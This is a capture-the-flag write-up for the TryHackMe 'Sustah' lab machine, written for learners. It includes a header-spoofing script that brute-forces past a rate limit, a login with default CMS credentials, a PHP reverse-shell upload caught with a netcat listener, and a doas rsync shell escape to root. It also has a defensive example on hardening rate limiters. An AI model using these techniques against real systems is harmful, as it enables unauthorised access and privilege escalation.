TryHackMe Sustah Writeup

Shivam Taneja
6 min read · Oct 29, 2022


This writeup will help you solve the Sustah box on TryHackMe. Before we start enumerating the box, add the following line to your /etc/hosts file (the file is root-owned, so a plain >> redirect from an unprivileged shell will fail; use tee with sudo):

echo "<box_ip> sustah.thm" | sudo tee -a /etc/hosts

Enumeration

We start with an nmap port scan of the host. The -sC flag runs nmap's default set of NSE scripts against the open ports (banner and service details, not a vulnerability scan) and -sV probes each port for version information.

nmap -sV -sC sustah.thm

The output of the scan can be seen below:

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7zuGtMGKQdFrh6Y8Dgwdo7815klLm7VzG05KNvT112MyF41Vxz+915iRz9nTSQ583i1cmjHp+q+fMq+QGiO0iwIdYN72jop6oFxqyaO2ZjBE3grWHSP2xMsTZc7qXgPu9ZxzVAfc/4mETA8B00yc6XNApJUwfJOYz/qt/pb0WHDVBQLYesg+rrr3UZDrj9L7KNFlW74mT0nzace0yqtcV//dgOMiG8CeS6TRyUG6clbSUdr+yfgPOrcUwhTCMRKv2e30T5naBZ60e1jSuXYmQfmeZtDZ4hdsBWDfOnGnw89O9Ak+VhULGYq/ZxTh31dnWBULftw/l6saLaUJEaVeb
|   256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBENNM4XJDFEnfvomDQgg0n7ZF+bHK+/x0EYcjrLP2BGgytEp7yg7A36KajE2QYkQKtHGPamSRLzNWmJpwzaV65w=
|   256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOd1NxUo0xJ3krpRI1Xm8KMCFXziZngofs/wjOkofKKV
80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Susta
8085/tcp open  http    syn-ack Gunicorn 20.0.4
| http-methods:
|_  Supported Methods: HEAD OPTIONS POST GET
|_http-server-header: gunicorn/20.0.4
|_http-title: Spinner
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports 80 and 8085 serve HTTP (Apache and Gunicorn respectively) and port 22 is SSH. Browsing to the document root of the web server on port 80 shows the following page:

The following page can be seen by browsing to http://sustah.thm:8085:

Since the web server on port 80 does not reveal much information, we will try to find the secret number for the web server running on port 8085.

Finding the secret number

To find the secret number, we intercept the request the Spinner page sends when a number is submitted, using Burp Suite with Firefox configured to use it as a proxy. With intercept on, submitting a number produces a request like the one in the following screen:

Right-click in the request editor and choose "Send to Intruder". On the Intruder tab clear the payload positions and mark only the value of the number parameter as the payload. If all went well you should see the following screen on the Intruder tab:

The payload is a list of the numbers 1 to 100000, so generate such a list and load it. Run the attack for a few minutes and you will see numerous responses with the following content:

There is a rate limit in place, which makes brute-forcing the secret number a bit harder. A web search shows that this kind of limit can often be bypassed when the application identifies the client by an IP address taken from request headers; the technique is described at https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass. We will brute-force the number with a Python script instead of Intruder. Take note of the extra request headers, which are what keep us from being throttled. The script can be seen below:

#!/usr/bin/env python3
import sys

import requests

URL = "http://sustah.thm:8085/"
MISS = "Oh no! How unlucky. Spin the wheel and try again."

# The limiter keys on an IP address it reads from client-supplied headers,
# so pointing every such header at 127.0.0.1 (the set suggested on the
# HackTricks rate-limit-bypass page) keeps us from being throttled.
HEADERS = {
    "X-Originating-IP": "127.0.0.1",
    "X-Forwarded-For": "127.0.0.1",
    "X-Remote-IP": "127.0.0.1",
    "X-Remote-Addr": "127.0.0.1",
    "X-Client-IP": "127.0.0.1",
    "X-Host": "127.0.0.1",
    "X-Forwarded-Host": "127.0.0.1",
}

session = requests.Session()  # reuse one TCP connection across guesses

for number in range(1, 100001):  # the wheel accepts 1..100000
    response = session.post(URL, data={"number": number}, headers=HEADERS)
    if MISS not in response.text:
        print(f"{number} is the lucky number!")
        sys.exit(0)

print("no number in 1..100000 produced a different response", file=sys.stderr)
sys.exit(1)

The script loops through the candidate numbers and sends one POST per number, checking whether the response still contains the "unlucky" message. Because the application appears to identify clients by the IP address it reads from these headers rather than by the connecting address, setting them all to 127.0.0.1 sidesteps the limit. Only the number that yields a different response is printed. Run the script; after a few minutes you should have the number and can answer the first question.
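Why those headers defeat the limiter is worth seeing in code. The following is an added example, not code from the original post or from the Spinner application (whose source we have not seen): a toy fixed-window rate limiter keyed two ways, once on an IP taken from client-supplied headers (the behaviour the box appears to have) and once on the TCP peer address with X-Forwarded-For honoured only behind a known proxy. All addresses in it are constructed for the demonstration.

```python
#!/usr/bin/env python3
"""Why the extra headers defeat the rate limit.

A fixed-window limiter is only as good as the key it counts on. If that key
is an IP address read from client-supplied headers, the client picks the key
and gets a fresh allowance whenever it wants. Compared here:
  client_ip_trusting()  - believes X-Forwarded-For and friends from anyone
  client_ip_hardened()  - uses the TCP peer address, and only honours
                          X-Forwarded-For when the peer is a proxy we operate
"""
from collections import defaultdict
import ipaddress

# Header names naive "real IP" lookups tend to consult (the same set the
# HackTricks rate-limit-bypass page suggests spoofing).
SPOOFABLE_HEADERS = ("X-Originating-IP", "X-Forwarded-For", "X-Remote-IP",
                     "X-Remote-Addr", "X-Client-IP", "X-Host", "X-Forwarded-Host")


def client_ip_trusting(peer, headers):
    """Vulnerable: the first spoofable header present wins, whoever sent it."""
    lower = {k.lower(): v for k, v in headers.items()}
    for name in SPOOFABLE_HEADERS:
        value = lower.get(name.lower())
        if value:
            return value.split(",")[0].strip()
    return peer


def client_ip_hardened(peer, headers, trusted_proxies=frozenset()):
    """Trust the socket peer. Only if the peer is one of our own proxies do we
    look at X-Forwarded-For, walking it from the right (the end our proxies
    appended) and skipping proxy addresses. Anything else falls back to peer."""
    if peer not in trusted_proxies:
        return peer
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if hop in trusted_proxies:
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            break  # junk the client put in the header; fall back to the peer
        return hop
    return peer


class FixedWindowLimiter:
    """Allow `limit` requests per key within one fixed window."""

    def __init__(self, limit, key_func):
        self.limit = limit
        self.key_func = key_func
        self.counts = defaultdict(int)

    def allow(self, peer, headers):
        key = self.key_func(peer, headers)
        self.counts[key] += 1
        return self.counts[key] <= self.limit


def brute_force_allowed(limiter, attempts, peer="10.0.0.5", spoof=True):
    """Send `attempts` guesses from one attacker host (constructed address
    10.0.0.5), optionally with a different X-Forwarded-For on every request,
    and return how many the limiter let through."""
    allowed = 0
    base = ipaddress.IPv4Address("198.51.100.0")  # constructed, documentation range
    for i in range(attempts):
        headers = {"X-Forwarded-For": str(base + i)} if spoof else {}
        if limiter.allow(peer, headers):
            allowed += 1
    return allowed


if __name__ == "__main__":
    weak = FixedWindowLimiter(10, client_ip_trusting)
    strong = FixedWindowLimiter(10, client_ip_hardened)
    print("trusting limiter, spoofed headers:", brute_force_allowed(weak, 500), "of 500 allowed")
    print("hardened limiter, spoofed headers:", brute_force_allowed(strong, 500), "of 500 allowed")
```

With a limit of 10 per window, the header-trusting limiter lets all 500 spoofed guesses through while the hardened one stops at 10. The fix on the server side is not a longer header blocklist; it is to key on the peer address and to accept forwarding headers only from proxies you control, taking the rightmost entry they appended rather than whatever the client wrote at the left.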

Initial foothold

Providing the secret number in the input field reveals a new URL path: /YouGotTh3P@th. This path belongs to the web server on port 80, so browse to http://sustah.thm/YouGotTh3P@th/ to find the following page:

A Content Management System (CMS) is software used to create and manage web content; WordPress is the best-known example. The page identifies the CMS as Mara. A quick search online shows that its login form is reached through the ?login GET parameter. Browse to http://sustah.thm/YouGotTh3P@th/?login and try the default credentials admin:changeme. You should now be logged in as admin and see the following page:

In the top header you can see that we are allowed to upload files, and Mara CMS does not restrict which file types are accepted, so we can upload a PHP reverse shell. Create a file named shell.php containing a PHP reverse shell and upload it through the site's upload function:

Make sure the script calls back to the IP address of your attacking machine on port 9001.

Uploaded files land in the img/ directory of the CMS, so the shell is now located under http://sustah.thm/YouGotTh3P@th/img/.

Run the following command on your attacking machine to start a netcat listener to catch the shell:

nc -lvnp 9001

Now browse to http://sustah.thm/YouGotTh3P@th/img/shell.php to start your reverse shell. You should now check the listening terminal and see the following lines appear:

Linux ubuntu-xenial 4.4.0-197-generic #229-Ubuntu SMP Wed Nov 25 11:05:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 14:14:45 up 58 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Improve your shell by running:

export TERM=xterm-256color
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
ENTER
ENTER

Please note that the uppercase words are not commands but key combinations on your keyboard. pty.spawn gives the remote shell a real terminal, and stty raw -echo on your local side stops your terminal from echoing and interpreting keystrokes, so tab completion, arrow keys and CTRL+C now work inside the reverse shell instead of killing netcat.

User Flag

Now that we have an initial foothold as www-data, the next step is to move to a real user and read the user.txt flag. Looking around the file system turns up an interesting backup of the password file at /var/backups/.bak.passwd with the following content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
kiran:x:1002:1002:REDACTED:/home/kiran:

The kiran entry stands out: its comment (GECOS) field, redacted above, holds kiran's plain-text password. Use it to switch user with su kiran and supply the password when prompted. The user.txt flag is located in /home/kiran/user.txt.

Root Flag

To complete this box we have to find the root.txt flag, which means escalating privileges to the root user. Start by running sudo -l to list the commands we may run as other users. The output is listed below:

Sorry, user kiran may not run sudo on ubuntu-xenial.

We cannot use sudo at all. The hint for this room says that we do not always have to use sudo, which reminded me of doas, the OpenBSD alternative. To find out which commands doas lets us run we first need its configuration file; in the end I found it at /usr/local/etc/doas.conf with the following content:

permit nopass kiran as root cmd rsync

This means kiran can run rsync as root without a password. GTFOBins lists a sudo shell escape for rsync, and the same trick works under doas: rsync's -e option names the program to use as the "remote shell", which rsync executes as root when given a remote path. The final command is:

doas rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

The inner sh attaches its stdin and stdout to stderr, which is still our terminal, so we land in an interactive root shell. The root.txt flag is located in /root/root.txt.

This was an interesting box to complete. You needed some basic scripting knowledge to find the secret number, and it was a good reminder that sudo is not the only way privileges get delegated on a Linux host: when sudo -l comes back empty, check for doas and its configuration file before concluding there is no escalation path.
